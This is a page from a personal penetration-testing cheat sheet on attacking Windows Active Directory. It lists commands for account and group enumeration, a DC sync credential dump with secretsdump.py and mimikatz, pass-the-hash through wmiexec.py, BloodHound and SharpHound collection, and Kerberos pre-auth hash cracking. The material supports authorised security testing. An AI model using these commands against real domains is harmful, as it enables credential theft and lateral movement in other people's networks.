d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Related
  • Target
  • General
  • net
  • DC sync attack
  • Pre-Auth attack
  • BloodHound
  • Gather information (on target)
  • Analyze data (on kali)
Edit on GitHub
  1. Services
  2. Misc

Active Directoy

PreviousMiscNextApache Tomcat

Last updated 2 years ago

Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management.

--

Related

Target

  • Domain Admins group

  • Domain Controller

General

Display permissions using PowerShell

dsacls "DC=<domain>,DC=<domain>"

net

List local accounts

net user

List domain accounts

net user /domain

Details about specific user

net user <user> /domain

List domain groups

net group /domain

Show domain's account policy

net accounts

DC sync attack

secretsdump.py <domain>/<user>:<pw>@<ip>
wmiexec.py <domain>/<user>@<ip> -hashes "<hash>"

Alternative approach (probably gets flagged by AV) Copy & execute mimikatz.exe on DC

lsadump::dcsync

Pre-Auth attack

BloodHound

Gather information (on target)

pip3 install bloodhound
bloodhound-python -u <username> -p <password> -ns <nameserver> -d <domain> -c All

OR

.\SharpHound.exe -c all -d <domain> --domaincontroller <dc-ip>

Copy generated *BloodHound.zip

OR

SharpHound.ps1
Invoke-BloodHound -Domain <domain> -LDAPUser <user> -LDAPPass <pass> -CollectionMethod All -DomainController <dc-ip>

Analyze data (on kali)

neo4j console
bloodhound

Connect to database

bolt://localhost:7687
neo4j
<PW>

Import data Upload Data select .csv, .json or .zip file(s)

1. sniff KRB auth packet 2. crack using hashcat

-> If no pre auth is required, just use to pull hashes from AD.

BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.

Wikipedia
TCP 88: Kerberos
TCP 389, 636, 3268, 3269: LDAP
Impacket
PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
DC Sync Attacks With Secretsdump.py - YouTube
Getting Passwords When Kerberos Pre-Auth IS Enabled - YouTube
Impacket
GitHub - BloodHoundAD/BloodHound